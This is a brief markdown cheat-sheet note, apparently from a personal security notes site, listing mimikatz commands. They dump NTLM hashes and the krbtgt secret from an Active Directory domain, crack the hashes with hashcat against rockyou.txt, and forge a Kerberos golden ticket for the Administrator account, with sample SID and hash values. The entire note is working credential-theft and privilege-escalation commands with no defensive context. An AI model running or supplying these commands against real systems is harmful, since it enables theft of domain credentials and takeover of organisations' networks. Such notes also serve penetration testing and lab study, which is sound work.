---
title: mimikatz
date: 2022-11-27T09:00:00Z
draft: false
type: note
author: Kaptan
category: Cyber Security
subcategory: Commands
tags:
  - commands
  - tools
---

**dumping user credentials inside of a active directory network(NTLM hashes):**

```zsh
mimikatz.exe
privilege::debug
lsadump::lsa /patch
hashcat -m 1000 <hash> rockyou.txt
# or
mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
```

```zsh
kerberos::golden \
    /user:[Administrator] \
    /domain:[controller.local] \
    /sid:[S-1-5-21-849420856-2351964222-986696166] \
    /krbtgt:[5508500012cc005cf7082a9a89ebdfdf] \
    /id:[500]
misc::cmd
```